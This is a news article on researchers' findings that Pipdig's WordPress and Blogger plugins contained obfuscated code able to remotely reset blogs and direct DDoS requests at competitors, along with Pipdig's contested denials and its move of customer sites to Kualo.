Security researchers found evidence that a Pipdig WordPress plugin contained suspicious code. Although Pipdig denied any wrongdoing, the company removed the questionable code from its plugin and repositories.
Pipdig makes custom themes for WordPress and Blogger, as well as the Pipdig Power Pack (P3) WordPress plugin, which is installed by default along with any WordPress theme. Suspicious code — some of which was obfuscated — found in the Pipdig WordPress plugin pointed to Pipdig being able to remotely reset customer blogs, change passwords or launch distributed denial-of-service (DDoS) attacks on competing sites.
The suspicious code was first reported by Mikey Veenstra, threat analyst at Wordfence, a WordPress security company, and Jem Turner, an independent developer, who conducted independent parallel investigations into Pipdig.
According to both reports, the P3 plugin contained code that uses Pipdig customer sites to issue hourly requests to Pipdig competitors’ sites in an effort to stage low-level DDoS attacks.
Pipdig responded by denying any malicious activity and providing rationales for the plugin having the access it did, but also quietly removed the suspicious code from both the plugin and the company’s code repositories. Veenstra followed up his initial report with more evidence that not only supported his claims, but showed direct contradictions in the Pipdig response.
The starkest contradiction was in Pipdig’s response to the accusation of a kill switch being available to reset a user’s blog.
In Pipdig’s original response posted on March 29, the company said, “There is a function in the plugin which can be used to clear database tables, much like a backup or standard reset plugin. To confirm, we do not have the ability to ‘kill’ a site, nor would we ever, ever want to do that!”
In the follow-up response posted on March 31, Pipdig again asserted the functionality was not a kill switch. But the company admitted “there was function in an older version of the plugin which could be used to reset a site back to the default settings.” Additionally, it implied the functionality was added as a result of an incident in July 2018, where Pipdig WordPress themes were stolen and resold illegally and used to reset those unauthorized sites.
However, Veenstra noted some discrepancies, the first of which is that there is no difference between a WordPress site reset to default and one that has been destroyed completely.
“Second, any honest plugin developer providing a legitimate means for a user to destroy their own database (whether that’s a good idea or not is a different story) would leave that choice strictly to the user. Instead of offering a user-facing button surrounded by ‘Are you sure you want to delete this entire database?’ warnings, the P3 plugin silently asks their servers once every hour if the database should be vaporized,” Veenstra wrote in a blog post. “Third, this answer conflicts with the previous one. Is this code for anti-piracy or for a ‘factory reset’? Has it ever been used or not?”
Veenstra said the original commit adding this reset functionality to the P3 plugin was added on Nov. 7, 2017, and was still part of the plugin as of March 25, 2019 — three days before Wordfence notified Pipdig of the issues.
Veenstra noted that he reached out to Pipdig at 12:29 p.m. on March 28, and by 2:30 p.m., most of the offending code was removed from the plugin, although the change log for this new version 4.8.0 was altered to appear as though it was released on March 24. Turner kept a copy of version 4.7.3 of the Pipdig WordPress plugin to verify claims. Additionally, Pipdig removed all code from its public Bitbucket repository on March 31.
Veenstra also found evidence the Pipdig Blogger plugin included obfuscated code similar to the Pipdig WordPress plugin, which would run DDoS attacks on competitors. Pipdig denied any DDoS attacks and claimed the code in question “is used to pass the theme’s license key to an external server.”
According to Veenstra, “None of this statement aligns with the actual behavior of the code.”
When Pipdig was contacted for comment, especially on the use of obfuscated code to hide some of this functionality, the company refused to comment and only pointed to its existing blog post, which does not mention obfuscated code.
We obtained a Pipdig support email from Phil Clothier, creative director at Pipdig, informing customers that the company was shutting down its hosting service for WordPress sites because of a “wave of support requests” following the security reports that Pipdig was unable to adequately address. Clothier wrote that Pipdig has arranged to transfer all customer sites to Kualo Ltd., a London-based hosting provider, and apologized for the inconveniences.
“To anyone which we have lost trust with, I deeply apologize for any stress/concern this has caused you,” Clothier wrote. “We will work hard to regain that trust and hopefully we can see you again in future when there is more clarity on events.”
Kualo, however, said via Twitter that Pipdig’s email was “a very premature announcement” and promised to provide more details on the arrangement in the near future.
Nicky Bloor, director of U.K.-based Cognitous Cyber Security, tweeted some of his own investigation into the Pipdig WordPress plugin and noted that Kualo has already begun to disable what it called “suspicous code” being run by Pipdig while Kualo investigates further.